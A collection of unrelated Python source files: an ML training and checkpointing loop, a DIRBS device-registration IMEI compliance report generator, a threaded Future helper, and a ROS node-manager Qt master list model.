artifacts_dir = output_dir / 'artifacts'
artifacts_dir.mkdir()
for k, v in artifacts.items():
with open(artifacts_dir / (k + '.pkl'), 'wb') as fp:
pickle.dump(v, fp)
if files is not None:
dst_dir = output_dir / 'files'
dst_dir.mkdir()
for file in files:
shutil.copy(file, dst_dir)
if metadata is None:
metadata = dict()
try:
model_metadata = model.get_metadata()
metadata['model_metadata'] = model_metadata
#print("Model parameters are: ")
#print('\n'.join(list(sorted('{}: {}'.format(k, v) for k, v in model_metadata.items()))))
except AttributeError:
print("Couldn't get model parameters, skipping model_params for the metadata")
metadata['training_params'] = training_config
json_encoder = JSONEncoder(sort_keys=True, indent=4, separators=(',', ': '))
with open(os.path.join(output_dir, 'metadata.json'), 'w') as metadata_fp:
json_encoding = json_encoder.encode(metadata)
metadata_fp.write(json_encoding)
best_performance = setup_metrics(model.evaluation_metrics())
return best_performance, model_format_string, output_dir
def training_loop(
*,
model,
training_dataset,
evaluation_dataset,
training_config,
best_performance,
model_checkpoint_format,
output_dir
):
epoch = 0
best_model_path = None
def sigint_handler(signal, frame):
checkpoint(model, model_checkpoint_format, np.nan, {}, is_best=False, keep_snapshots='all')
sys.exit(0)
signal.signal(signal.SIGINT, sigint_handler)
# Since we call evaluate_models from som many places below, we summarize the common arguments in a dict
with Monitor(output_dir / 'logs') as monitor:
eval_kwargs = dict(model=model,
evaluation_dataset=evaluation_dataset,
model_checkpoint_format=model_checkpoint_format,
monitor=monitor,
keep_snapshots=training_config.keep_snapshots)
if training_config.do_pre_eval:
best_performance, best_model_path = evaluate_model(best_performance=best_performance, epoch=0, **eval_kwargs)
# These variables will be used to control when to do evaluation
eval_timestamp = time.time()
eval_epoch = 0
eval_iteration = 0
needs_final_eval = True
for epoch in trange(training_config.max_epochs, desc='Epochs'):
if hasattr(model, 'fit_dataset'):
model.fit_dataset(training_dataset)
elif hasattr(model, 'fit_batch') or hasattr(model, 'fit'):
## This is the main training loop
for i, batch in enumerate(tqdm(training_dataset, desc='Training batch')):
needs_final_eval = True
epoch_fraction = epoch + i / len(training_dataset)
if hasattr(model, 'fit_batch'):
training_results = model.fit_batch(batch)
elif hasattr(model, 'fit'):
print("Model has 'fit' attribute, we treat it as fit_batch")
training_results = model.fit(batch)
monitor.log_one_now('epoch', epoch_fraction)
if training_results is not None:
monitor.log_now(training_results)
# eval_time and eval_iterations allow the user to control how often to run evaluations
eval_time_dt = time.time() - eval_timestamp
eval_iteration += 1
if (
(training_config.eval_time is not None
and training_config.eval_time > 0
and eval_time_dt >= training_config.eval_time)
or
(training_config.eval_iterations is not None
and training_config.eval_iterations > 0
and eval_iteration >= training_config.eval_iterations)
):
best_performance, best_model_path = evaluate_model(best_performance=best_performance, epoch=epoch_fraction, **eval_kwargs)
eval_timestamp = time.time()
eval_iteration = 0
needs_final_eval = False
monitor.tick()
# End of training loop
eval_epoch += 1
if (
training_config.eval_epochs is not None
and training_config.eval_epochs > 0
and eval_epoch >= training_config.eval_epochs
):
best_performance, best_model_path = evaluate_model(best_performance=best_performance, epoch=epoch, **eval_kwargs)
eval_epoch = 0
needs_final_eval = False
# End of epoch
# Done with the whole training loop. If we ran the evaluate_model at the end of the last epoch, we shouldn't do
# it again
if needs_final_eval:
best_performance, best_model_path = evaluate_model(best_performance=best_performance, epoch=epoch, **eval_kwargs)
return best_performance, best_model_path
def evaluate_model(*,
model,
evaluation_dataset,
best_performance,
model_checkpoint_format,
epoch,
monitor=None,
keep_snapshots=False):
evaluation_results = {}
if hasattr(model, 'evaluate_dataset'):
evaluation_results.update(model.evaluate_dataset(evaluation_dataset))
elif hasattr(model, 'evaluate_batch') or hasattr(model, 'evaluate'):
gathered_evaluation_results = defaultdict(list)
for batch in tqdm(evaluation_dataset, desc='Validation batch'):
if hasattr(model, 'evaluate_batch'):
batch_eval_results = model.evaluate_batch(batch)
elif hasattr(model, 'evaluate'):
print("Model has 'evaluate' method, we treat it as 'evaluate_batch'")
batch_eval_results = model.evaluate(batch)
for k, v in batch_eval_results.items():
gathered_evaluation_results[k].append(v)
for k, v in gathered_evaluation_results.items():
if v:
try:
evaluation_results[k] = np.mean(v)
except TypeError:
print("Not logging result {}, can't aggregate data type".format(k))
new_performance = best_performance.update(evaluation_results)
is_best = new_performance.cmp(best_performance)
if monitor is not None:
monitor.log_now({k: v for k,v in evaluation_results.items()})
best_model_path = checkpoint(model, model_checkpoint_format, epoch,
new_performance, is_best, keep_snapshots=keep_snapshots)
if is_best:
best_performance = new_performance
if monitor is not None:
monitor.log_now({'best_{}'.format(k):v for k,v in best_performance.items()})
best_performance_file = model_checkpoint_format.with_name('best_performance.csv')
with open(best_performance_file, 'w') as fp:
items = [(k.name, v) for k,v in best_performance.items()]
keys, vals = zip(*sorted(items))
fp.write(','.join(str(k) for k in keys) + '\n')
fp.write(','.join(str(v) for v in vals) + '\n')
return best_performance, best_model_path
def setup_directory(output_dir: Path):
# Create directory and set up symlinks if it doesn't already exist.
output_dir.mkdir(parents=True, exist_ok=True)
parent_dir = output_dir.parent
symlink_name = parent_dir / 'latest_experiment'
if symlink_name.is_symlink() or symlink_name.exists():
symlink_name.unlink()
symlink_name.symlink_to(output_dir.relative_to(parent_dir))
def checkpoint(model,
checkpoint_format: Path,
epoch,
performances,
is_best,
latest_model_name='latest_model',
best_model_name='best_model',
keep_snapshots: Union[Literal['all', 'none', 'best'], bool] = False):
if isinstance(keep_snapshots, bool):
if keep_snapshots:
keep_snapshots = 'all'
else:
keep_snapshots = 'none'
model_directory = checkpoint_format.parent.resolve(strict=False)
model_name = checkpoint_format.name.format(epoch=epoch, metrics=performances)
checkpoint_path = checkpoint_format.with_name(model_name).resolve()
model_directory.mkdir(exist_ok=True)
checkpoint_path = model.save(checkpoint_path)
latest_model_symlink = model_directory / latest_model_name
best_model_symlink = model_directory / best_model_name
if keep_snapshots != 'all' and latest_model_symlink.exists():
latest_model = latest_model_symlink.resolve(strict=True)
if not best_model_symlink.exists() or latest_model != best_model_symlink.resolve(strict=True):
if latest_model.is_dir():
shutil.rmtree(latest_model)
else:
latest_model.unlink()
if os.path.lexists(latest_model_symlink):
latest_model_symlink.unlink()
relative_checkpoint = checkpoint_path.relative_to(latest_model_symlink.absolute().parent)
latest_model_symlink.symlink_to(relative_checkpoint)
if is_best:
# Path.exists() on a symlink will return True if what the symlink points to exists, not if the symlink exists
# To check if the symlink exist, we call is_symlink() as well a exists(), if the path is a symlink, is_symlink()
# will only return true if it exists, if either returns True, than the file exists and we should remove it
# whether it's a symlink or not
if best_model_symlink.exists():
if keep_snapshots == 'none':
# The previous best model can't also be the latest model since we take care of that above, so it's safe
# to remove
previous_best_model = best_model_symlink.resolve(strict=True)
if previous_best_model.is_dir():
shutil.rmtree(previous_best_model)
else:
previous_best_model.unlink()
if best_model_symlink.is_symlink():
best_model_symlink.unlink()
relative_checkpoint = checkpoint_path.relative_to(best_model_symlink.absolute().parent)
best_model_symlink.symlink_to(relative_checkpoint)
return best_model_symlink.resolve()
def setup_training_config(config_path):
return load_config(config_path, TrainingConfig)
def add_parser_args(parser):
""" Add common command line arguments used by the training function.
"""
parser.add_argument('--output-dir',
help=("Directory to write output to."),
type=Path)
parser.add_argument('--max-epochs', help="Maximum number of epochs to train for.", type=int, default=100)
parser.add_argument('--eval-time', help="How often to run the model on the validation set in seconds.", type=float)
parser.add_argument('--eval-epochs', help="How often to run the model on the validation set in epochs. 1 means at the end of every epoch.", type=int)
parser.add_argument('--eval-iterations', help="How often to run the model on the validation set in number of training iterations.", type=int)
parser.add_argument('--do-pre-eval', help="If flag is set, the model will be evaluated once before training starts",
action='store_true')
parser.add_argument('--keep-snapshots', help="If flag is set, all snapshots will be kept. otherwise only the best and the latest are kept.",
action='store_true')
if __name__ == '__main__':
conf = TrainingConfig()
foo = dict(a=1, b=2, c=[1,2,3])
json_encoder = JSONEncoder(sort_keys=True, indent=4, separators=(',', ': '))
json_encoder.encode(conf) |
reports_generator.py | """
DRS Reports generator package.
Copyright (c) 2018-2020 Qualcomm Technologies, Inc.
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted (subject to the limitations in the disclaimer below) provided that the following conditions are met:
Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
Neither the name of Qualcomm Technologies, Inc. nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
The origin of this software must not be misrepresented; you must not claim that you wrote the original software. If you use this software in a product, an acknowledgment is required by displaying the trademark/log as per the details provided here: https://www.qualcomm.com/documents/dirbs-logo-and-brand-guidelines
Altered source versions must be plainly marked as such, and must not be misrepresented as being the original software.
This notice may not be removed or altered from any source distribution.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import os
from app import session, celery, app
from requests import ConnectionError
from app.api.v1.helpers.error_handlers import *
from app.api.v1.helpers.multisimcheck import MultiSimCheck
from threading import Thread
from math import ceil
import pandas as pd
import uuid
import json
class BulkCommonResources: # pragma: no cover
"""Common resources for bulk request."""
@staticmethod
@celery.task
def get_summary(imeis_list, tracking_id):
"""Celery task for bulk request processing."""
try:
imeis_chunks = BulkCommonResources.chunked_data(imeis_list)
records = BulkCommonResources.start_threads(imeis_list=imeis_chunks)
# send records for summary generation
response = BulkCommonResources.build_drs_summary(records, tracking_id)
return response
except Exception as e:
raise e
@staticmethod
def chunked_data(imeis_list):
"""Divide IMEIs into batches of 1000 and chunks for multi threading."""
try:
if imeis_list:
imeis_list = list(imeis_list[i:i + 1000] for i in
range(0, len(imeis_list), 1000))
chunksize = int(ceil(len(imeis_list) / 10))
imeis_list = list(imeis_list[i:i + chunksize] for i in range(0, len(imeis_list), chunksize))
return imeis_list
return imeis_list
except Exception as e:
raise e
@staticmethod
def start_threads(imeis_list):
"""Process IMEIs simultaneously by starting multiple threads at a time."""
thread_list = []
records = []
unprocessed_imeis = []
for imei in imeis_list:
thread_list.append(Thread(target=BulkCommonResources.get_records, args=(imei, records, unprocessed_imeis)))
# start threads for all imei chunks
for x in thread_list:
x.start()
# stop all threads on completion
for t in thread_list:
t.join()
if unprocessed_imeis:
records, unprocessed_imeis = BulkCommonResources.retry(records, unprocessed_imeis)
return records
# get records from core system
@staticmethod
def get_records(imeis, records, unprocessed_imeis):
"""Compile IMEIs batch responses from DIRBS core system."""
try:
while imeis:
imei = imeis.pop(-1) # pop the last item from queue
try:
if imei:
batch_req = {
"imeis": imei,
"include_registration_status": True,
"include_stolen_status": True
}
headers = {'content-type': 'application/json', 'charset': 'utf-8', 'keep_alive': 'false'}
app.logger.info('{}/imei-batch'.format(app.config['CORE_BASE_URL']+app.config['API_VERSION']))
imei_response = session.post('{}/imei-batch'.format(app.config['CORE_BASE_URL']+app.config['API_VERSION']),
data=json.dumps(batch_req),
headers=headers) # dirbs core batch api call
if imei_response.status_code == 200:
imei_response = imei_response.json()
# if imei_per_device is not None:
# imeis_for_multi_sim_check = [imei[x:x + imei_per_device] for x in range(0, len(imei),
# imei_per_device)]
# multi_sim_result = MultiSimCheck.validate_imeis_capacity(app.config['CORE_BASE_URL'],
# app.config['API_VERSION'],
# imeis_for_multi_sim_check)
#
# if len(multi_sim_result) > 0 and multi_sim_result[0] == False:
# imei_response['results'][0]['multi_sim_matched'] = multi_sim_result[0]
# imei_response['results'][0]['multi_sim_info'] = multi_sim_result[1]
# elif len(multi_sim_result) > 0:
# imei_response['results'][0]['multi_sim_matched'] = multi_sim_result[0]
records.extend(imei_response['results'])
else:
app.logger.info("imei batch failed due to status other than 200")
unprocessed_imeis.append(imei) # in case of connection error append imei count to unprocessed IMEIs list
else:
continue
except (ConnectionError, Exception) as e:
unprocessed_imeis.append(imei) # in case of connection error append imei count to unprocessed IMEIs list
app.logger.exception(e)
except Exception as error:
raise error
@staticmethod
def retry(records, unprocessed_imeis):
"""Retry failed IMEI batches."""
retry = 10
while retry and len(unprocessed_imeis) > 0:
threads = []
retry = retry - 1
imeis_list = unprocessed_imeis
unprocessed_imeis = []
chunksize = int(ceil(len(imeis_list) / 10))
imeis_list = list(imeis_list[i:i + chunksize] for i in
range(0, len(imeis_list), chunksize)) # make 100 chunks for 1 million imeis
for imeis in imeis_list:
threads.append(Thread(target=BulkCommonResources.get_records, args=(imeis, records, unprocessed_imeis)))
for x in threads:
x.start()
for t in threads:
t.join()
return records, unprocessed_imeis
@staticmethod
def build_drs_summary(records, tracking_id):
"""Generate summary for DRS bulk records."""
try:
response = {}
if records:
result = pd.DataFrame(records) # main dataframe for results
stolen_list = pd.DataFrame(list(result['stolen_status'])) # dataframe for stolen status
pending_stolen_count = len(stolen_list.loc[stolen_list['provisional_only']==True])
stolen = len(stolen_list.loc[stolen_list['provisional_only']==False])
count_per_condition = {}
realtime = pd.DataFrame(list(result['realtime_checks'])) # dataframe of realtime checks
seen_on_network = len(realtime.loc[realtime['ever_observed_on_network']==True])
blocking_condition = pd.DataFrame(i['blocking_conditions'] for i in result['classification_state'] if i['blocking_conditions']) # dataframe for blocking conditions
info_condition = pd.DataFrame(i['informative_conditions'] for i in result['classification_state'] if i['informative_conditions']) # dataframe for informative conditions
# IMEI count per blocking condition
count_per_condition, block = BulkCommonResources.count_condition(count=count_per_condition, conditions=blocking_condition)
# IMEI count per informative condition
count_per_condition, info = BulkCommonResources.count_condition(count=count_per_condition, conditions=info_condition)
# processing compliant status for all IMEIs
data = BulkCommonResources.generate_drs_compliant_report(records, tracking_id)
# summary for bulk verify IMEI
response['provisional_stolen'] = pending_stolen_count
response['verified_imei'] = len(records)
response['count_per_condition'] = count_per_condition
response['non_compliant'] = data['non_compliant']
response['compliant'] = data['compliant']
response['compliant_active'] = data['compliant_active']
response['provisional_non_compliant'] = data['provisionally_non_compliant']
response['provisional_compliant'] = data['provisionally_compliant']
response['seen_on_network'] = seen_on_network
response['stolen'] = stolen
response['compliant_report_name'] = data['filename']
# response['multi_sim_not_matched'] = data['multi_sim_not_matched']
response['id'] = tracking_id
return response
except Exception as e:
raise e
# generate compliant report and count non compliant IMEIs
@staticmethod
def generate_drs_compliant_report(records, tracking_id):
"""Return non compliant report for DRS bulk request."""
non_compliant = 0
compliant = 0
active_compliant = 0
provisionally_compliant = 0
provisionally_non_compliant = 0
complaint_report = []
# multi_sim_not_matched = 0
for key in records:
status = BulkCommonResources.compliance_status(resp=key, status_type="bulk", imei=key['imei_norm'])
status['stolen_status'] = "Pending Stolen Verification" if key['stolen_status']['provisional_only'] \
else "Not Stolen" if key['stolen_status']['provisional_only'] is None else "Stolen"
status['seen_on_network'] = key['realtime_checks']['ever_observed_on_network']
if "Provisionally Compliant" in status['status']:
provisionally_compliant += 1
elif "Provisionally non compliant" in status['status']:
provisionally_non_compliant += 1
elif status['status'] == "Compliant (Inactive)":
compliant += 1
elif status['status'] == "Compliant (Active)":
active_compliant += 1
elif status['status'] == "Non compliant":
non_compliant += 1
# if "multi_sim_matched" in key:
# if key['multi_sim_matched'] is not True:
# multi_sim_not_matched += 1
complaint_report.append(status)
complaint_report = pd.DataFrame(complaint_report) # dataframe of compliant report
report_name = 'compliant_report' + str(uuid.uuid4()) + '.tsv'
report_path = os.path.join(app.config['DRS_UPLOADS'], '{0}'.format(tracking_id))
complaint_report.to_csv(os.path.join(report_path, report_name), sep='\t')
del_columns = ['block_date', 'seen_on_network', 'stolen_status']
restricted_report = complaint_report.drop(del_columns, axis=1, errors='ignore')
user_report_name = 'user_report-{}'.format(report_name)
restricted_report.to_csv(os.path.join(report_path, user_report_name), sep='\t')
data = {
"non_compliant": non_compliant,
"compliant": compliant,
"compliant_active": active_compliant,
"provisionally_non_compliant": provisionally_non_compliant,
"provisionally_compliant": provisionally_compliant,
"filename": report_name,
"user_report_name": user_report_name,
# "multi_sim_not_matched": multi_sim_not_matched
}
return data
# count per condition classification state
@staticmethod
def count_condition(conditions, count):
"""Helper functions to generate summary, returns IMEI count per condition."""
condition = []
transponsed = conditions.transpose()
for c in transponsed:
cond = {}
for i in transponsed[c]:
cond[i['condition_name']] = i['condition_met'] # serialize conditions in list of dictionaries
condition.append(cond)
condition = pd.DataFrame(condition)
for key in condition: # iterate over list
count[key] = len(condition[condition[key]]) # count meeting conditions
return count, condition
@staticmethod
def compliance_status(resp, status_type, imei=None):
"""Evaluate IMEIs to be compliant/non complaint."""
try:
status = {}
seen_with = resp['realtime_checks']['ever_observed_on_network']
blocking_conditions = resp['classification_state']['blocking_conditions']
stolen_status = resp['stolen_status']['provisional_only']
reg_status = resp['registration_status']['provisional_only']
block_date = resp.get('block_date', 'N/A')
gsma_not_valid = resp['realtime_checks']['gsma_not_found']
in_registration_list = resp['realtime_checks']['in_registration_list']
invalid_imei = resp['realtime_checks']['invalid_imei']
if reg_status: # provisionally non - compliant as registration pending
status = BulkCommonResources.populate_status(status, 'Provisionally Compliant', status_type,
blocking_conditions,
['Device already applied for registration'], imei=imei)
elif not reg_status and in_registration_list:
status = BulkCommonResources.populate_status(status, 'Compliant', status_type,
blocking_conditions,
['Device already registered in DIRBS/DRS'], imei=imei,
seen_with=seen_with)
elif stolen_status: # non - compliant as stolen
status = BulkCommonResources.populate_status(status, 'Provisionally Non compliant', status_type,
blocking_conditions,
['Device is reported stolen and is pending'], imei=imei,
block_date=block_date)
elif stolen_status is not None:
status = BulkCommonResources.populate_status(status, 'Non compliant', status_type,
blocking_conditions,
['Device is reported stolen'],
imei=imei,
block_date=block_date)
# elif "multi_sim_matched" in resp and resp['multi_sim_matched'] is not True:
# status = BulkCommonResources.populate_status(status, 'Non compliant', status_type, blocking_conditions,
# [resp['multi_sim_info']['simslot_mismatch']],
# imei=imei, block_date=block_date)
elif not gsma_not_valid and not in_registration_list and block_date is None and not seen_with and \
not invalid_imei:
# Compliant Device
status = BulkCommonResources.populate_status(status, 'Compliant', status_type, imei=imei, seen_with=seen_with)
else:
status = BulkCommonResources.populate_status(status, 'Non compliant', status_type, blocking_conditions,
['Device is non compliant check blocking conditions if '
'not found it may be invalid IMEI'],
imei=imei,
block_date=block_date)
# if reg_status: # device's registration request is pending
# if stolen_status: # device's stolen request pending
# status = BulkCommonResources.populate_status(status, 'Provisionally non compliant', status_type, blocking_conditions, ['Your device is stolen report is pending'], imei=imei, block_date=block_date)
# elif stolen_status is False: # device is stolen
# status = BulkCommonResources.populate_status(status, 'Non compliant', status_type, blocking_conditions, ['Your device is stolen'], imei=imei, block_date=block_date)
# else: # device is not stolen
# status = BulkCommonResources.populate_status(status, 'Provisionally Compliant', status_type)
# elif reg_status is None: # device is not registered
# status = BulkCommonResources.populate_status(status, 'Non compliant', status_type, blocking_conditions, ['Your device is not registered'], imei=imei, block_date=block_date)
# else: # device is registered
# if stolen_status: # stolen request is pending
# status = BulkCommonResources.populate_status(status, 'Provisionally non compliant', status_type, blocking_conditions, ['Your device stolen report is pending'], imei=imei, block_date=block_date)
# elif stolen_status is None: # device is not stolen
# status = BulkCommonResources.populate_status(status, 'Compliant', status_type, seen_with=seen_with)
# else: # stolen device
# status = BulkCommonResources.populate_status(status, 'Non compliant', status_type, blocking_conditions, ['Your device is stolen'], imei=imei, block_date=block_date)
return status
except Exception as error:
raise error
@staticmethod
def populate_status(resp, status, status_type, blocking_condition=None, reason_list=None, imei=None, block_date=None, seen_with=None):
"""Return compliant status of an IMEI."""
try:
resp['imei'] = imei
if status == 'Compliant' or status == 'Provisionally Compliant':
if seen_with:
resp['status'] = status + ' (Active)'
else:
resp['status'] = status + ' (Inactive)'
if status_type == "bulk":
return resp
else:
return {"compliant": resp}
else:
resp['status'] = status
resp['block_date'] = block_date
if status_type == "basic":
resp['inactivity_reasons'] = BulkCommonResources.populate_reasons(blocking_condition, reason_list)
elif status_type == "bulk":
resp['inactivity_reasons'] = BulkCommonResources.populate_reasons(blocking_condition, reason_list)
return resp
return {"compliant": resp}
except Exception as error:
raise error
@staticmethod
def populate_reasons(blocking, reasons_list):
"""Return reasons for IMEI to be non compliant."""
try:
voilating_conditions = [key['condition_name'] for key in blocking if key['condition_met']]
for condition in app.config['conditions']:
if condition['name'] in voilating_conditions:
reasons_list.append(condition['reason'])
return reasons_list
except Exception as error:
raise error
# count IMEIs meeting no condition
@staticmethod
def no_condition_count(all_conditions):
"""Helper functions to generate summary, returns count of IMEI satisfying no conditions."""
no_conditions = 0
for key in all_conditions:
if (~all_conditions[key]).all():
no_conditions += 1
return no_conditions
|
async.py | #!/usr/bin/env python
# encoding: utf-8
"""
async.py - functions for asyncrounous code
Created by Maximillian Dornseif on 2009-02-15.
Copyright (c) 2009 HUDORA. All rights reserved.
parts based on http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/84317
"""
import copy
import logging
import sys
import threading
import time
class Future:
"""This calls a function in a separate thread and returns a function waiting for that thread to finish.
Typical use:
tagfuture = Future(get_slow_tagcount, 'parameter') # starts a separate thread
... do something else ...
tagcount = tagfuture() # waits for thread to finish and returns result
"""
def __init__(self, func, *args, **kwargs):
# Constructor
self.__done = False
self.__result = None
self.__status = 'working'
self.__excpt = None
self.__namecache = func.__name__
self.__Cond = threading.Condition() # Notify on this Condition when result is ready
# Run the actual function in a separate thread
self.__Thread = threading.Thread(target=self.Wrapper, args=((func, ) + args), **kwargs)
self.__Thread.setName("FutureThread")
self.__Thread.start()
def __repr__(self):
return '<Future at ' + hex(id(self)) + ':' + self.__status + '>'
def __call__(self):
waitstart = time.time()
self.__Cond.acquire()
while self.__done is False:
self.__Cond.wait()
self.__Cond.release()
# We deepcopy __result to prevent accidental tampering with it.
ret = copy.deepcopy(self.__result)
if self.__excpt:
raise self.__excpt[0], self.__excpt[1], self.__excpt[2]
waitend = time.time()
if waitend - waitstart > 1:
logging.debug("waited %.1f s for %s", waitend - waitstart, self.__namecache)
return ret
def Wrapper(self, func, *args, **kwargs):
# Run the actual function, and let us housekeep around it
self.__Cond.acquire()
try:
self.__result = func(*args, **kwargs)
except:
self.__result = "Exception raised within Future"
self.__excpt = sys.exc_info()
self.__done = True
self.__Cond.notify()
self.__Cond.release()
|
master_list_model.py | # Software License Agreement (BSD License)
#
# Copyright (c) 2012, Fraunhofer FKIE/US, Alexander Tiderko
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Fraunhofer nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import sys
from python_qt_binding.QtCore import QObject, QRect, Qt, Signal
from python_qt_binding.QtGui import QIcon, QImage, QStandardItem, QStandardItemModel
try:
from python_qt_binding.QtGui import QItemDelegate, QPushButton, QStyle
except Exception:
from python_qt_binding.QtWidgets import QItemDelegate, QPushButton, QStyle
from socket import getaddrinfo, AF_INET6
import threading
from fkie_master_discovery.master_discovery import DiscoveredMaster
from fkie_master_discovery.common import get_hostname
from fkie_node_manager_daemon.common import isstring
import fkie_node_manager as nm
class MasterSyncButtonHelper(QObject):
'''
This is helper class to which contains a button and can emit signals. The
MasterSyncItem can not emit signals, but is used in QStandardModel.
'''
clicked = Signal(bool, str)
NOT_SYNC = 0
SWITCHED = 1
SYNC = 2
ICON_PREFIX = 'irondevil'
# ICON_PREFIX = 'crystal_clear'
def __init__(self, master):
QObject.__init__(self)
self.name = master.name
self._master = master
self._syncronized = MasterSyncButtonHelper.NOT_SYNC
self.ICONS = {MasterSyncButtonHelper.SYNC: nm.settings().icon("%s_sync.png" % self.ICON_PREFIX),
MasterSyncButtonHelper.NOT_SYNC: nm.settings().icon("%s_not_sync.png" % self.ICON_PREFIX),
MasterSyncButtonHelper.SWITCHED: nm.settings().icon("%s_start_sync.png" % self.ICON_PREFIX)}
self.widget = QPushButton()
# self.widget.setFlat(True)
self.widget.setIcon(self.ICONS[MasterSyncButtonHelper.NOT_SYNC])
self.widget.setMaximumSize(48, 48)
self.widget.setCheckable(True)
self.widget.clicked.connect(self.on_sync_clicked)
def on_sync_clicked(self, checked):
self.set_sync_state(MasterSyncButtonHelper.SWITCHED)
self.clicked.emit(checked, self._master.uri)
def master(self):
return self._master
def get_sync_state(self):
return self._syncronized
def set_sync_state(self, value):
if self._syncronized != value:
self._syncronized = value
if value in self.ICONS:
self.widget.setIcon(self.ICONS[value])
self.widget.setChecked(value == MasterSyncButtonHelper.SYNC)
def __eq__(self, item):
if isstring(item):
return self.master.name.lower() == item.lower()
elif not (item is None):
return self.master.name.lower() == item.master.name.lower()
return False
def __gt__(self, item):
if isstring(item):
return self.master.name.lower() > item.lower()
elif not (item is None):
return self.master.name.lower() > item.master.name.lower()
return False
class MasterSyncItem(QStandardItem):
'''
This object is needed to insert into the QStandardModel.
'''
ITEM_TYPE = QStandardItem.UserType + 35
def __init__(self, master):
QStandardItem.__init__(self)
self.name = master.name
self.button = MasterSyncButtonHelper(master)
self.parent_item = None
@property
def master(self):
return self.button.master()
@property
def synchronized(self):
return self.button.get_sync_state()
@synchronized.setter
def synchronized(self, value):
self.button.set_sync_state(value)
def __eq__(self, item):
return self.button == item
def __gt__(self, item):
return self.button > item
class MasterItem(QStandardItem):
'''
The master item stored in the master model. This class stores the master as
fkie_master_discovery.ROSMaster.
'''
ITEM_TYPE = QStandardItem.UserType + 34
def __init__(self, master, local=False, quality=None, parent=None):
self.name = ''.join([master.name, ' (localhost)']) if local else master.name
QStandardItem.__init__(self, '') # self.name)
self.parent_item = None
self._master = master
self.local = local
self.__quality = quality
self.descr = ''
self.ICONS = {'green': nm.settings().icon('stock_connect_green.png'),
'yellow': nm.settings().icon('stock_connect_yellow.png'),
'red': nm.settings().icon('stock_connect_red.png'),
'grey': nm.settings().icon('stock_connect.png'),
'disconnected': nm.settings().icon('stock_disconnect.png'),
'warning': nm.settings().icon('crystal_clear_warning.png'),
'clock_warn': nm.settings().icon('crystal_clear_xclock_fail.png')}
self.master_ip = None
self._master_errors = []
self._diagnostics = []
self._timediff = 0
self._threaded_get_ip()
self.updateNameView(master, quality, self)
def _threaded_get_ip(self):
thread = threading.Thread(target=self.__get_ip)
thread.daemon = True
thread.start()
def __get_ip(self):
try:
# get the IP of the master uri
result = getaddrinfo(get_hostname(self.master.uri), None)
ips = []
for r in result:
if r[0] == AF_INET6:
(_family, _socktype, _proto, _canonname, (ip, _port, _flow, _scope)) = r
else:
(_family, _socktype, _proto, _canonname, (ip, _port)) = r
if self.master_ip is None and ip:
self.master_ip = ''
if ip and ip not in ips:
self.master_ip = ' '.join([self.master_ip, ip])
ips.append(ip)
# self.updateNameView(self.master, self.quality, self)
except Exception:
import traceback
print(traceback.format_exc(1))
@property
def master(self):
return self._master
@master.setter
def master(self, value):
self._master = value
@property
def quality(self):
return self.__quality
@quality.setter
def quality(self, value):
if self.__quality != value:
self.__quality = value
self.updateMasterView(self.parent_item)
@property
def diagnostics(self):
return list(self._diagnostics)
@property
def master_errors(self):
return list(self._master_errors)
def updateMasterErrors(self, error_list):
self._master_errors = error_list
self.updateNameView(self.master, self.quality, self)
def add_master_error(self, msg):
if msg not in self._master_errors:
self._master_errors.append(msg)
self.updateNameView(self.master, self.quality, self)
def update_master_diagnostics(self, diagnostics):
del self._diagnostics[:]
for diagnostic in diagnostics.status:
if diagnostic.level > 0 and diagnostic.hardware_id == self._master.name:
self._diagnostics.append(diagnostic)
self.updateNameView(self.master, self.quality, self)
def updateTimeDiff(self, timediff):
self._timediff = timediff
self.updateNameView(self.master, self.quality, self)
